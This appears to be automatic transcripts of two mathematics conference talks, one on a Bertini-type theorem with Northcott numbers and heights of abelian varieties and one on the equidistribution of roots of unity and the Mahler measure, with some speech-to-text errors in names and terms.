Thank you, thanks a lot. Bonjour à tous. It's a pleasure to be in Marseille, well virtually, but still thank you very much also for the organizers to make this happen. So I will report on some joint work with Martin Wittmer about Bertini and Northcott, so that's the title. Before starting math, let me just mention that the first time we discussed this with Martin was actually in Graz. I visited Graz in 2016. He invited me to give a talk and to stay there for a few days and then so we met also with Robert T. T. there, so I was also pretty happy to now report on what has been done so far thanks to that first invitation. Okay, so Bertini and Northcott, I will divide the talk into three. So I will start with some generalities. I will talk a little bit about some height functions, define what is the Northcott number, what we call the Northcott number and explain what Bertini theorem we obtain. So I will explain a little bit of the general scope. I won't go too much into the proofs of course, but you're very welcome to ask either now or later. So then the second part will be an application of the first part to the case of a billion varieties. So the first part will be a rather general for projective varieties and then I will specialize to a billion varieties and then we're going to describe what I call the APJ machine. So it's some kind of strategic theorem that aims at reducing proof to the case of Jacobian, to the sub case of Jacobian varieties. So that's the second part and the third part we're going to learn from the machine. So we're going to describe some applications of this theorem. So we're going to do a bit of machine learning in a way if you want, even though of course it has not so much to do with machine learning, but still a little play on word doesn't harm, right? So okay, so that's the plan. Let me start. So I'm going to start with a pick a point in a projective space. It's a point that has coordinates over a number field. And so what we want is to measure the size of that point. So how to do that in general, what you do is you select evaluation, probably the Archimedean one, and then you do a little bit of analysis just to understand how big the point is. So you can also do that over the Piatik fields. And then in high theory what we do is we just collect everything with respect to all the absolute values, non-trivial, so Archimedean and non-Archimedean. So that's this MK that you can see here. It's just a set of unequivalent, non-trivial absolute values. So I'm just taking log max of all the coordinates and I have the height of x. Of course, a rather classical object in number theory. In particular, if I have a number, an algebraic number now, I can see that number as an element in P1 just by saying the first coordinate will be 1 and then this is my alpha. And then you just apply the formula I described here and you get the height of alpha. So we know how to measure the size of an algebraic number. An example that is classical that will help us also a little bit later is the roots of unity, as we've seen in the previous talk. So then the root of unity has height 0 and that's clear from the explicit formula because of course all the absolute values will be 1. So then log of 1 will be 0 and we just sum a bunch of zeros. So okay, so this height, this is the height of a point. I will also be interested in defining the height of a variety but I will do that a bit later. So now I can define the Northcott number. So what is the Northcott number? Let me pick a set of algebraic numbers. It's an infinite set, it's more interesting what it is and I will need infinite sets of algebraic numbers a bit later to formulate the first theorem. So for any real number, I'm going to cut that set at height t. So that's this little s with little t here. So now I have a set of numbers in s. So these are all algebraic numbers. I can take the height, the veil height that I just defined previously and I want the height to be bounded by this level t. So the Northcott number of the set s is defined to be the infimum of all the non-negative t's such that this st is infinite. So what does it mean? It means that if I have an m of s that is finite, it's possible for me in the set s to find a lot of numbers with bounded height. So that's basically what it means, right? So a lot means infinity, really a lot. So this will be very important for us for the Bertini statement. I give you two examples to illustrate that definition. Let me pick a q-bar or we have all the algebraic numbers in s now. So then this m will be zero and how come? Well, because previously I recalled that the height of a root of unity is zero and we have infinitely many roots of unity in q-bar because we don't restrict the degree now. So of course, in that case, t can just be zero. In fact, the infimum is attained. So that's the first example. Second example, if we now we just respect to q, so if now s is the field of rational numbers, then the infimum is in fact plus infinity because we will never have infinitely many rational numbers of bounded height. That's the Northcott theorem. So this is why we call it the Northcott number. So that Northcott number is just basically saying, is there a way to select height somewhere such that below that height, I have infinitely many algebraic numbers and all these algebraic numbers will be used or at least the fact that I have a lot will be important in the in the Bertini theorem. So keep that in mind. This Northcott number, if it's finite, it will tell me that there's an option to get infinitely many algebraic numbers with bounded height. Good. So what do we know? We know how to take the height of a point and we know how to define this Northcott number. So I go a bit beyond that. So now I'm going to pick a projective variety of dimension g. So projective variety basically, let's consider is just a collection of polynomials, so the zero set of a polynomial of a system of polynomials in several variables. So that's my x and this is defined over a number field k. So what I'm going to do now is define a height for x. So if you know the theory of show forms, then so then you'll just follow that quickly. If you don't, so just imagine I'm picking a model that is rather nice. It's using plucker coordinates in the protective space I'm working with. But if you're not an expert there, don't worry, we just need a model that describes x in a rather nice way. So that's this fx. So fx is a polynomial in many variables that describes my variety x. So it's a model, projective model for my variety. And then I will define the height of x to be the height of that polynomial. So you could, there are several ways of doing this, you could take for instance, the maximum of the height of the coefficients defining that polynomial or the height of the vector or a view as a projective point. I mean, there's there's there's equivalent ways of doing this. So just basically the size of that polynomial of the coefficients describing my variety. So that's the height of a variety. Okay. So a remark is that the the height of x will of course depend on the chosen projective model. Good. So in part two, I will specialize on on the case of a billion varieties. And that's the aim of the aim of the call areas as well in the end. So now I'm going to define another height that we will use only for a billion varieties. And I'm doing this because it's a little bit more intrinsic. So for this one, I will give you a little bit more details. But we will use it only in in the second part. Okay, so keep in mind now, if you have a projective variety, you have this height, a chow form height, with respect to a model, so some polynomials are describing the variety. And then we just take the height of these polynomials. And now if the variety happens to be an a billion variety, there will be a competing theory, another theory of heights, where we can also talk about the size of the variety. Okay, so I will, I will just give you the definition here, give a few comments, and then I can, I can give the theorem. So faulting site, what is that? So now I have a number field that I'm going to deal with an a billion variety, a of dimension G. Okay, is the ring of integers of that number field. And so it's there's a little bit more algebraic geometry here. So we will, we will study the variety as a generic fiber of what is called a scheme, a neural model over spec okay. So basically, it gathers the information about the variety itself. So that's the way it's called the generic fiber. And then you take a look at what is happening when you reduce modulo the the primes of the of okay. So you take a look at what's happening modulo various prime ideals at the same time. So you have a big object like a family if you want. So that's, that's my model. And then there's a section of that. So what are we going to define here? So we, we want to study the size to have a definition of the size of the a billion variety, but we want to avoid choosing a projective model, we want to avoid equations in a way. So how do we do that? The trick is to use you really go back to the very beginning of varieties in a way. What is the definition is really something that comes from differential forms. So what we do inside instead of taking the size of coordinates or the size of polynomials defining the variety, we take the size of a differential form. So how do you take the size of a differential form? So that's the space of my g differential forms here. Well, we, we basically integrate it. So for any line bundle of respect, okay, so for any such data, when you have a section, then you, you, you define what is called the Arachel of degree. So that's a complicated formula here. If you're not an expert, I, I, I understand that. But, but okay, so basically what you have to keep in mind is that there's a finite part, really something that comes from the primes where you reduce, when you reduce modulo p, and then there's a part that comes from the Archimede inside. And this is precisely where we will have this integrals coming in, coming in the game. So MK infinity, this is just a set of embeddings into the complex numbers. So that's, that's one definition. So you have the, the space of differentials on your variety. This is a second definition. If you have a line bundle, you can take what is called an Arachel of degree. And now I come to the definition of the fault in site. This is just a combination of the two. We take the Arachel of degree of the differentials, but we need metrics to, for the definition to make sense. So how do you measure the size of the Archimede in places? And this is how you do, you just integrate your differential so, so that you get a volume form so that this integral is actually well defined. And it was going to give you a positive number. So it makes sense in the, in the log that we took. So, okay, it's a complicated number, but this is a real number. And that real number will, will measure the size of the variety of the variety that we want to study, the ability and variety we want to study. So now a remark, maybe that's the thing you need to focus on is it does not depend on projective models. So it's a way to measure the size without having any model in a way. That's a bit more intrinsic. So this is the reason why we, we spend a little bit of time on this, because there is a way to actually measure the size of a polynomial without the polynomial, if you want. So, okay, so that's the Abelian case. Let me give you a little explanation that will also help you understand what's happening towards the end. I give you here the explicit formula of the faulting site of an elliptic curve. So an elliptic curve has an easy model. And then if you want to check how this faulting, faulting site behave, then you can take a look at this formula. So basically it's the log of the discriminant. So it has information about bad primes. You collect all the bad primes, well, a little bit more, sometimes they come with some powers. And then you take the norm of that ideal, it's something positive. And then you get the log of that thing. So that's the bad, I mean, the situation coming from the bad primes from the, from the finite places. And then the Archimedean places, it's also a log here of the delta. This is the discriminant form, delta of tau, the classical, if I express it with the Q series, it's the Q product of one minus Q to the N to the power 24. And then this M tau to the, to the six is, is just a, some kind of symmetry factor, if you want, just to make sure that this will be invariant under the change of variables by the action of SL2Z. So this tau is the period of the billion varieties of the elliptic curve. And so if you take a look at the J invariant expansion, so the J invariant as a modular function has a Q expansion. So you take that Q expansion, starts with one over Q plus seven, four, four plus one, nine, six, eight, eight, four, Q plus, etc., etc. You take that form and then you compute its size for the classical complex module. So if you compute its size, it will be very linked. So this strange symbol just means up to multiplicative factors, constant factors, which are essentially two pi or something like this. It's basically the size of M tau V. So if now you have a family of elliptic curves and this J invariant is moving, it will move the log of the J invariant will move a little bit like M tau, which means if you take a look at this formula, basically the faulting height is max of the bad prime, the log of the discriminant, comma the height of the J invariant. So this is something that we can make, of course, more precise, but basically what is really measured by the height is how bad the reductions can be and where are you in the modular space of elliptic curves. So okay, for a billion varieties, we have this height that has a link with, it seems to have a link with some bad primes and some J invariant. Now the thing is that to link in general the height of an abelian variety with the bad primes is not that easy, in fact, and it will be the object of one of the coronaries. So keep that in mind, for elliptic curves, it was rather easy if we know these formulas. So let's see what happens in the higher dimension. Okay, so now we're ready to give the first theorem. So Bertini type theorem, I will first state the theorem and then I will explain why it's interesting and give you a little bit of background maybe on Bertini theorems afterwards. So here it is, we will take a number field and we will fix a set of numbers, algebraic numbers, with finite Northcott number. Let me recall, what does it mean? It is, it means if the Northcott number is finite, there's a way to find infinitely many algebraic numbers with bounded height on S. In particular, S cannot be a number field, it has to be a little bit bigger. So now let X be a smooth closed variety in Pm, dimension bigger equal to 2. There exists a finite set inside this big S and a curve C, so a projective variety of dimension one that is defined over K over little s. So it might be only defined over the number field, the base field, but it might also be that we need to extend the base field to have enough core coefficients to actually describe the curve C. This curve C is drawn on X if you want, so there's a there will be an immersion inside X. This curve is smooth, irreducible, and such that we have three controls. The genus of that curve is controlled by the degree of X square plus the degree of X. So the degree of X is essentially the degree of the polynomials that describe X in the projective embedding. Now the degree of C, so how complicated is C in terms of polynomials describing it, it cannot be bigger, it may be chosen so that it's not more complicated than X, in fact the degree is controlled by the degree of X. And now the height of C, so the height in the sense of two forms you remember, so basically the height of the model that we get for the curve C is controlled by the height of X plus a factor that depends on the dimension, the degree of X that's expected, and what do we have here, the Northcott number. So basically the size of C, of the curve C is controlled by the size of X, and eventually some of the coefficients that we needed to actually compute that curve C. So it's rather natural, even though there's a lot of invariance, it's a rather natural statement, basically it says okay you start with a variety, there is a way to build up a curve that has controlled genus, controlled degree, and controlled height in a very explicit way. So that's the result, the first result that we have. So I will now comment a little bit on it. So first of all what's a Bertini theorem, so maybe let me just explain the following thing. If you have a variety given by some polynomials of dimension G, then let's imagine you cut that variety with a hyperplane, so cut what does it mean, you add an equation, a hyperplane equation, so now the new system that you get describing the intersection has dimension one less. So the goal of a Bertini statement is to say okay when I do that process, if I start with something smooth, am I still smooth? If I start with something irreducible, am I still irreducible? If I start with a property A, am I keeping that property A, if you want, when I do this intersection. And why is that important? Well if you know how to control that, then you have a perfect tool to build proofs by induction. So if you start to prove some statement, if you want to prove some statement in algebraic geometry and you have such a tool that says oh I start with something smooth, if I cut then I find something that is dimension one less, still smooth, still satisfying the hypothesis I'm interested in, that in fact you're starting to build up some, some, or there's an option of building up an induction argument, so that's very useful in fact. So here if you want, I only mentioned that we can find a curve, but of course how do you get a curve? Well basically you cut and cut and cut until you find something of dimension one, and then you have eventually some components and there's a way to to single out the one that you like, and that's the curve that you that you get. So in fact in the proof of that statement that I that I have here on the screen, I'm using several times some classical Bertini arguments to get, to get, to get a curve in the end, something of dimension one in the end, okay, so it's already built in if you want in the proof. So first remark that I just said, Bertini theorems are very useful in particular for induction arguments. Okay, so now how do you prove this result? We rely on some previous works of Philippe Raymond for the, for the height part or the fact that that we can control some of the intermediate steps in the height, and then Kedore and Tamagawa, they explained how to get an explicit control on the genus. So the real, except for really writing down the proof and getting all the details correct, the real new input if you want in this part on the Bertini statement is really the dependence in this SDR, automatic control on the coefficients that we are actually using to create this curve. Okay, so now that's, that's what I wanted to say as a general, like that was the main first part, generalities. So the goal now is to use that statement in the case of a billion varieties where there's many open questions that I'm interested in about essentially the more elevated group, for instance, so the rational points of the a billion variety. So, so that's the, that's what I'm planning to do now for the second part. All right. So a billion variety and a billion variety, it's like an elliptic curve for those who maybe don't manipulate that every day. It's, it's a group variety that is algebraic, and that is projective. So it means you have equations, you have nice projective equations, and you also have a group structure really like similar to what is happening for elliptic curves, if you want. So examples of a billion varieties, you take your favorite elliptic curve and then use E, and then you do E cross E cross E G times, and then you get something that is already something of dimension G. Anyway, so I'm picking an a billion variety of dimension G defined over in the field in the second part. And now, if, if I insist that there's a principal polarization on it, so it's an additional structure that you can add sometimes, then we may even assume that the curve C that comes from the Bertini statement that we gave, so an a billion variety is projective, I can use the Bertini statement, it provides me with a curve C, right, that has controlled genus, controlled height, controlled degree. Now, I can even assume that this curve in fact satisfies the following. So this curve has a Jacobian, so there's a way to build another a billion variety that knows quite a lot about the curve C itself. And then in fact, the a billion variety I start with can be seen as a sub a billion variety of the Jacobian. So you see the, the structure will be like, we have an a billion variety, on this a billion variety we draw a curve, and in fact, we may even choose that curve such that the a billion variety can be viewed as a sub variety of the Jacobian. So the curve knows things in both ways in a way, this is a bit vague, but it will maybe be clearer in a moment. So now I want to consider a quantity of interest, Q of a k in my notation, what does that mean? Well, it will be something that depends on a, and that depends on k on the arithmetic of k. So it could be, for instance, let's say the rank of the model of a group of a over the number field k, or maybe the number of torsion points, you see, it will depend on a, it will depend on k. It could be even just a dimension of a, it could be, what's the smallest norm of a prime where you have super singularity, what's there are many, many quantities of interest that depend on a, and that depends on the base field. And I want to study all of them at the same time. So I, what basically I'm going to describe here is a machine that will help us getting some diaphanetic information about Q. So pause a little bit, you have a quantity of interest, maybe you're interested in the rank, maybe it's the torsion, maybe it's some special primes, and you want to know what you want to know if that quantity can be controlled by the height of the variety. So you want to know, is it possible that the rank is controlled by the height, let's say, or that the torsion is controlled by the height. So that's a very diaphanetic question, because basically it says you have a variety in front of you, and it has some equations. And then you're interested in something about that variety, and you want to know if you can guess something about the quantity in terms of the equation. Okay, so as you've noticed here, I'm using the faulting height. So basically, I'm not using the equation. So the question is even deeper, it's more like, you have an abelian variety, no matter what the type of equations you use to describe it, then the height will be controlling this quantity. This is basically what it means. So because I'm using the faulting height here is something more interesting. So it should not depend on the model. So it should be something that is really, that has a meaning in itself for the variety, if you want. So basically, you want to know, is it possible to bound the quantity of interest? And then to be precise, of course, you have to say, well, there might be some, some little error term or something, and it should not be depending on a, or at least, maybe just on the dimension, that's what we want to allow. Okay, so that's the generic question, is it possible to control the quantity? So let me list some desirable properties for that, that quantity Q, that, that allow us to actually prove something. So E will be pick an extension of K. So we started with a number field K, let me pick an extension of K, called a K prime. Now I would like this quantity to grow with extension, or at least, because you see there's a little C, not to decrease too, too, too much. So if I'm allowing it to decrease, it has to be with a somehow a bounded amount, it has to, they have to be similar comparable. Okay, so E stands for extension. So for extension, I would like the quantity to kind of grow, or at least not to drop too much. So now P will be product. So now imagine you have a product of a billion varieties, I would like that quantity to grow with respect to products. So as you can see in this formula, I'm breaking the symmetry a little bit, but you can take max of AB here, it doesn't matter because A cross B is B cross A. So basically just the quantity for A cross B has to be bigger than the quantity for A. That's P for product. And then I will be another desirable property. So I would like my quantity not to move too much in an isogenic class. So an isogenic is a morphism with finite degree, finite kernel. So I mean an isomorphism is an isogenic, and then you may allow a little quotient of finite number of elements in the kernel. So basically if you look at A, you start with A and you take a look at all a billion varieties that are not too far for that matter, so isogenous, then this quantity should not move too much. That's I, that stands for isogenous. And then I have a a lost, lost property and that will be the result I would like to prove. So I would like to have that the height is controlling the quantity for any a billion varieties and then you see here in J, I'm only asking it for Jacobians. So I'm, so J has, as you can see it's in blue, has a little bit of a different flavor than the other ones. The other ones are like really axioms in a way, like this is really the kind of quantities that we can deal with. And then starting with J, you're starting to prove, I mean you want to prove the inequality height of A is bigger than the quantity A, k. And basically what the machine will tell us is that it suffices to to do it for Jacobian. So this J has a little bit of a different, different feeling for me at least. Okay, anyway, so keep in mind we have extension, product, isogenes and the Jacobian case, which is a sub case of the general case. So now here is the machine. So the theorem says we start with a number field, that's the base field, and then we take a Northcott set with finite Northcott number. So that's the set S. And then assume that you have a quantity of interest Q and that satisfies E, P and I, and that J works. So that the inequality we want to prove is actually working for Jacobians. In that case, you get what you want, except that you, of course, will get a dependence on the set you started with. Okay, so you need to be able to compute or at least to bound from above the M of S, such that you have something explicit here. So what is this machine? Basically the machine says you have a quantity of interest, you want to bound it from above by the height. Then you can reduce the whole proof to the case of Jacobians, which is a sub case where we have more tools in general. And luckily, you can prove the case of Jacobians and then you get the general result. So that's what the machine tells you. It says, if you can prove this inequality only in the sub case of Jacobians, then you can actually get the general, the general result. Okay, so that's the machine. And now I would like us to learn from the machine altogether. So let's see what we can actually prove with that reduction step that we describe here. So this is my first example. I'm going to consider primes of bad reduction. So now I'm defining my quantity of interest. What is of interest? What am I interested in? Well, I have my abelian variety and I'm very interested in understanding when is, is it that when you reduce mod p, you have a singular node set, let's say, when, when, when is it that you have bad reduction? That's important for many applications. So, so, so it's actually something that it's nice to control. It's actually nice to be able to guess or to find explicitly where are these, these primes. So now p is an ideal that runs into a, okay, and I'm focusing on semi stable bad reduction because I'm allowing myself to do finite extensions of the base field in the proof. So, so that's, that's not, that's not a problem. So now, what, so now I'm going to check the desirable properties just to make sure I can use the machine. So I, I will start by e and in fact, e is, is, is not completely easy. E was extension. So it means that I take my quantity, so the norm of the bad primes, and I want to know what's, what's happening when I do extensions of fields. But as you know, if you take a norm of an ideal and you now start to extend the field where you take this norm, if the ideal is ramifying, then this, I mean, the quantity will not increase. So the extension properties now we're now already in trouble. So the thing is, we can control that by controlling the ramification of K prime. So now if you, if, if, let's say you take an unramified extension, then you know it's not going to drop this quantity not going to drop. So, so basically if you start with a base field K, and you can find enough numbers of bounded height in an unramified extension, you're good to go. You have, you have enough numbers so that you will be able to use the Bertini statement to build the curve, etc. But this is not always possible because some fields don't have enough unramified extension. Sometimes they don't have any. So basically there's a lot of arithmetic here. The main result that we use to ensure that it's possible to reduce to a case where we have enough unramified extension is a theorem of Golot-Cefarovich from the 60s, where you actually find a way to build a tower, an infinite tower, in fact with the steps that are extension of degree two, where you have unramified extensions. So basically it's possible to deal with this and to ensure that E works, but it will not be for any S. It will be for an S that needs to be built and that needs careful treatment. Okay, but it is possible. It's part of the result. So, okay, extension we get. Now, good stuff is that the others are easier. Now, product is easy because if you have a bad prime for A, of course it will be a bad prime for A cross B. So then we have P for free and we have I for free. So I'm saying easy is not completely easy, but it relies on some existing results. So isogenous abelian varieties, they share the same bad primes. So then of course the quantity will not move in that case. So we have E with some work. P is easy. I relies on some previous works. So we're good to go. We have a quantity that that could lead to something. The thing is the J, is it easier for Jacobian? So basically I'm telling you how to reduce an inequality to a sub case of Jacobian varieties, but if it's not easier for Jacobians than you, you just did everything for nothing. So we need to work a bit further. Jacobian case, luckily, of course, I selected that example because we know how to do something. So for J we can use what is called the neuter arithmetic formula. So it's not an easy formula. It comes from a molecular geometry, but it says the following. If you have a semi-stable curve C, this faulting height, this very intrinsic height, has a closed expression, closed formula that goes like this. So it's some of some integrals, integers times log of the bad primes. So this is precisely log of the bad primes that I'm interested in. These integers are bigger or equal to one. As soon as you have semi-stable bad reduction, this is precisely what I want to control. So I can just lower bound delta P by one. And then I have some other terms. So this delta sigma, this is what is called a delta invariant of feltings. It's a, I mean, it's an analytic invariant that is rather mysterious. And then omega square is the dualizing chief, auto intersection of the dualizing chief of the curve. It's also something rather abstract. Luckily, recent work of Robert Wilms that appeared in the, in the Tionist math in 2017, lead to this sum. So the extra terms that we have here being non-negative. How nice. So basically what does it mean? It means we have J. You see, this is the height, feltings height that we, that we want on the left side. And then this is the bad primes that we want on the right side. And we have the inequality that goes in the right direction. So we have J. If we have J, because we have E for a specific S, P, EZ and I coming from previous works, then basically we have the result. The machine tells us feltings height is in fact controlling the bad primes. So if you want to go into the details, in fact, the S that I found is even controlled by a constant that depends only on G. So there are other proofs of that inequality that are rather recent. And they use a different technique. So they come from, the first one comes from a Hingery and Pachyco, they were, they proved this for function fields, a billion variety of function fields. And that was adapted by Vazhner and his PhD. So there's another way to prove this inequality by using rigid uniformization. So it's a different, completely different way. And then you have Robin de Jong and Faber-Chukrier, a bit recent, that gave another proof using Verkovich spaces. So both proofs are used rather, rather heavy machinery. And, but they lead to the same, in fact, to slightly stronger results. I can give you some details if you want one day. When we have a blackboard again, I can maybe give a little bit more on this. Anyways, so this inequality now is correct. And it actually leads to an interesting corollary that I'm now going to give you. Interesting corollary. And this is this upper bound on the rank. So because I have the control on the bad primes by the height, and because I know how to do descent on general abelian varieties, so that's a different technique, something, something else, I can prove that the rank of a is bounded above by the following expression. So take a look. So now I have some explicit constant C that depends on the dimension of a. And then I have the degree of the base field to the cube. And then I have max of one log of the discriminant of the base field. So the primes that ramify in the base field. And then the defaulting site of the abelian variety. So this is unconditional. This is really something that you have. Using combining both inequalities, one that says the rank is controlled by the bad primes. This is the descent argument I mentioned. But I didn't explain here. And then what I explained here is bad primes is controlled by the height. And so if you combine both, of course, you get that the rank now is controlled by the height with this explicit expression here. So that triggers the following question. Is there any hope to do better? I mean, we would like to know how the rank is varying, say for elliptic curves over Q even. We don't know if it's bounded or not. And they're competing heuristics. Try to understand if it's bounded or not. And if it's bounded by what and to understand a little bit more about families of these elliptic curves or of these abelian varieties. So now what can we expect using these techniques of diaffantine inequalities? So there's one thing that I would like to know. Is it possible to get rid at least of the discriminant here? This is something that would be interesting to know. I mean, the bound on the rank has to depend on the field, on the base field. Because, I mean, otherwise you get something crazy. I mean, if you increase the base field, you get new points. And there's a way to prove that. In fact, the rank is growing indeed. So it has to depend on the field. You know you need a dependence on the field in the upper bound. But do you really need the discriminant? Discriminant is a complicated invariant. Degree is a very easy invariant. So if the control could be only in terms of the degree, we would be rather astonished and happy. I would be happy at least. So that's the question I have. Is there any hope of doing better? But now we have a machine. We can use that machine maybe and check what's happening. So what's happening here in this last part? I'm now fixing that the quantity of interest, the new quantity of interest is the rank itself. Not the bad primes log of the norm of the bad primes, whatever from before. Now it's the rank itself. So now let's me check the desirable properties to see if I can use the machine. So now extension. Yes, when you increase the base field, you increase the rank. Or maybe you stay stable, but at least you don't go down. So E is easy. So now P is easy as well. Because if you have an abelian variety, if you cross with another one, then you can only add in the rank. So the product is also easy. And now isogeny is also easy because I mean, recall an isogeny has finite kernels. So you cannot kill a direction. You cannot drop the rank here. So we have E, P and I. So it means that we are now reducing to the case of Jacobian using the machine. So what's the case of Jacobian? So we have to be very careful here because if we just take the rank here and if we just take the faulting site here, some properties about the faulting site tell you that this kind of inequality will not hold like that. You need a dependence on the base field extra. Because basically the faulting site has a tendency to drop by extension until it reaches semi-stability and then it's stable. It stays constant. So basically this inequality would be the rank is bounded by something that does not depend on which is not correct. So it means that in this inequality, you need a constant that depends at least on the degree. Okay, fine. So then what happens if we assume that then in fact we reach what is called the Hondas conjecture. So Hondas conjecture says the rank of an abelian variety over a number field could be, would be, maybe is controlled by a constant depending on A times the degree of the base field. So this is slightly more precise or maybe a bit stronger form of Hondas conjecture. So it's a conjectural statement that says that in fact the rank is controlled linearly in terms of the degree as soon as you fix A. And what we say here is that if the constant depending on A in the, in the, in this inequality is in fact linear in the height or polynomial in the height, it will be similar. Then in fact the whole proof boils down to proving the Jacobian case. So you, I mean the machine doesn't give you that completely directly because there's this extension of field that you need to do and you need to check quite a few details, right? But the philosophy is really this. The philosophy says you think a little bit with the engine, this is what I wrote. So the philosophy says, okay, so basically if you want to prove Honda, you can start by Jacobians and you, you'll get there eventually using some reduction, some reduction step that is provided here by the machine. Okay. So now Honda is a very difficult conjecture and we don't, we don't really know much more in the Jacobian case in fact. So, so it's still, it's still something we think about. But anyways, we were pretty happy to see that we could reduce this statement to that. Good. So I think I've, I've said what I wanted and I would like to thank you for your attention. Yeah Fabien, thank you very much for your talk. There is already one question formulated. Yes. So I see a question in the chat by Schmidt Habegger. Yes. So he's asking whether your bound can be replaced by this bound here, constant times log of degree of isogenic. Yes. So, so the short answer is yes. I will now give maybe a little bit, a little bit more. So here you see he's referring to, to this, this C. So now if I have two isogen, two billion varieties and an isogenic, there's an important invariance is that the degree of that isogenic. So now if I allow myself here to have a log of the degree of the isogenic using work of master and Vistols, we can control the degree of a minimal isogenic by a polynomial in the height. But if I take the log of the degree, then I get a multiple of the log of the height. But I'm dealing with heights here linearly. So if I get imagine, I get some extra term here that is logarithmic in the height coming from errors. It won't matter in the end for the general statement. So the answer is yes, Philip, I can weaken the condition like that. Yes. Thank you very much. Is that satisfactory, Philip, or are there following up questions? Okay.
|
I will report on joint work with Martin Widmer. Let X be a smooth projective variety over a number field K. We prove a Bertini-type theorem with explicit control of the genus, degree, height, and field of definition of the constructed curve on X. As a consequence we provide a general strategy to reduce certain height and rank estimates on abelian varieties over a number field K to the case of Jacobian varieties defined over a suitable extension of K. We will give examples where the strategy works well!
|
10.5446/53724 (DOI)
|
Okay, thank you, Robert, and thank you for introducing me and inviting me to this virtual conference in DEMINI. So the title of my talk is Equidistribution of Roots of Unity and the Mahler Measure, and I will talk about joint work with Vaseline Dimitrov. Okay, so let me just take some classical facts. Let's look at how Roots of Unity distributes in the complex plane. So what I'm looking at here, these points, they are Roots of Unity of order dividing 30. So they are complex numbers of the form e to the 2 pi i k over 30. And I let k run over all integers. Of course, it's enough just to go from 0 to 29. And I get these 30 dots here, and they lie on the unit circle, of course, and as you can see, they are very nicely equidistributed along the unit circle. And the theorem here is that if you let the order or the end here, capital N, go to infinity. So if you're looking at all Roots of Unity of order dividing N, then these points will become equidistributed around the unit circle. So let me recall what that actually means. How can we formulate equidistribution in a precise way? So the same picture with the 30 dots on top. And let me just... Okay, so what does equidistribution mean? It means that if I have a test function defined on the unit circle, this function f here, which has to be continuous, complex values, then if I take the average of my test points, of the test points, the Roots of Unity, take the average of this function on these points, and then take the limit as downstairs here, then I'll converge to the integral of the function along the unit circle. So the integral of f long, e to the... Well, we've got here e to the 2 pi i t. So we're running along the unit circle here in the usual counterclockwise direction. And this limit exists and equals exactly the integral. So this is a very classical result, and it's also quite easy to prove. Let me just give you an idea how the proof works, because we'll see arguments like this later on in a more sophisticated way. So let's see what happens if we take a very basic function, which is just f of z takes... f takes z to the lth power, where l is some integer. And well, now our average here simplifies to this geometric sum here, which is taking the sum k from 0 to n minus 1, and then upstairs here in the exponent, we have e to the 2 pi i k over n, and as one learns in the first year calculus class. Even earlier, how to compute sums like this. Well, if n happens to be divisor of l, of course, all terms will be 1, and so the average will also be 1. And if l is not a divisor, if n is not a divisor of l, then geometric sum formula tells us that the sum here vanishes. So in the limit, if we take n going to infinity here, in this case, then we will eventually be in this situation here. If l is fixed, and so the limit will be 0 for l not equal to 0, and that is exactly the integral of the function along the unit circle. So if more generally, our function is a finite linear combination of powers of z, so possibly negative powers of z, then as I just explained up there, the only term that survives in the limit is l equals 0, and that corresponds here to the term a naught. So that's what we get here. So for n goes to infinity, this average is exactly the constant term here in this Laurent polynomial, and that happens to be exactly this integral. So for these finite Laurent polynomials, liquid distribution follows just by considering a geometric sum. And in general, you can do some analysis to extend this kind of results to all continuous functions on the unit circle. Okay, so that's what happens with roots of unity and continuous test functions. Let me go on. So up to now, I've been looking at roots of unity of order dividing n. So there are always n different points in the complex plane of that type. Now I want to shift to roots of unity with order exactly n. And as you see here in the picture, there can be a lot less. Here we have only eight dots, and eight is the Euler function by evaluated at 30. So to get the number of roots of unity of order exactly n is just the order of this finite ring here, c modulo nz, sorry, this finite group, units in c modulo nz. So the number of elements in this group is given by the Euler function. So they're a lot sparser and it's not so clear by just looking at the picture that you'll get equidistribution because we've got a huge gap here, we've got a huge gap here, a slightly smaller gap here and a slightly smaller gap here, and also a gap over here. Nevertheless, this is also a classical result. So computing the corresponding sum here, where you take the average over the polynomial and the log polynomial z to the l of the roots of unity of order exactly n, this average can be computed and is also expressible up to sign in terms of the Euler function. As you see here, there's a to the minus one here in the exponent. So if n increases and l is nonzero, then the value here inside the Euler function will increase, will grow essentially like n, and we know also classically that the Euler function here, it grows almost linearly, it grows like n to the one minus epsilon. So this term here, if l is not zero, this term here will go to zero and we can also recover equidistribution just like in the first case. So what is the significance of taking order exactly n versus order dividing n? So the significance is of arithmetic nature. So here we're looking essentially at roots of unity of this type, e to the 2 pi i k over n, where k is coprime to n, these are exactly those of order n, and this happens to be exactly the Galois conjugates of any root of unity of order n. So this set is as arithmetic importance because it's exactly the set of Galois conjugates of roots of unity. So roots of unity of order exactly n, n goes to infinity, we also get equidistribution just like in the first case. So here I've got a picture with n equals 240, so now you begin to see that we get nice distribution, there are still some gaps here and here and here, but they don't matter in the limit. So what I'm going to talk mainly about today is what happens in this definition of equidistribution, what happens if you weaken the hypothesis that the test function is continuous. Remember you have to test your sequence against the continuous test function on the unit circle, what happens if we drop the continuity condition. And so there's a result I'd like to talk about by Matt Baker, Stephen E., and Rob Brumley from over 10 years ago, which is also motivation for the work presented today. So what they look at is they take an algebraic number alpha here and the test function they have is essentially of this nature. You take log of e to the 2 pi i t minus alpha, right, that's the test function. Now depending on the value of alpha, this may or may not be continuous, it may not be even defined on the whole unit circle, because if alpha itself lies on the unit circle, you'll have log 0 at 1.0, you have a logarithmic singularity. But nevertheless, they were able to show that if you take the average over roots of unity of given order, so of a Galois orbit like this on the left hand side, and you let the order go to infinity, then this average will converge to the integral. So the same thing you would expect with classical equidistribution. Of course, you have to be a bit careful. This may not be defined for us a fixed k and a fixed alpha, but as we're taking n to infinity, this difference will be nonzero for fixed alpha. For fixed alpha, eventually it's not going to be a root of unity of order exactly n, for n large enough, and so this will be well defined in the limit, and the limit exists and equals this integral. Now as I pointed out, it depends on the result or the proof of the result, essentially depends on the value of alpha. So the first case is if alpha is, for example, minus 1.5 as here, well in this case, the function, test function happens to be continuous again because there is no logarithm of singularity as t goes from 0 to 1. So I've plotted here the function in blue, below left, and you see there's a minimum here, it's negative, but it's okay. So in this case, if alpha is not on the unit circle, their theorem follows from the classical result I just mentioned before using those Raman-Uchand cells. Situation becomes a bit more interesting if our alpha is on the unit circle as here, alpha equals minus 1, and you see here the function, it has a logarithmic singularity at 1.5, e to the 2 pi i, 1.5 equals minus 1, and so that's where we have the problem. And in this case, it's not actually a problem as we'll see later on because e to the 2 pi i, a over n plus 1, which corresponds to alpha equals minus 1, this will be roughly, this cannot be too small if k over n, if the exponential there is not equal to minus 1. So this will be roughly 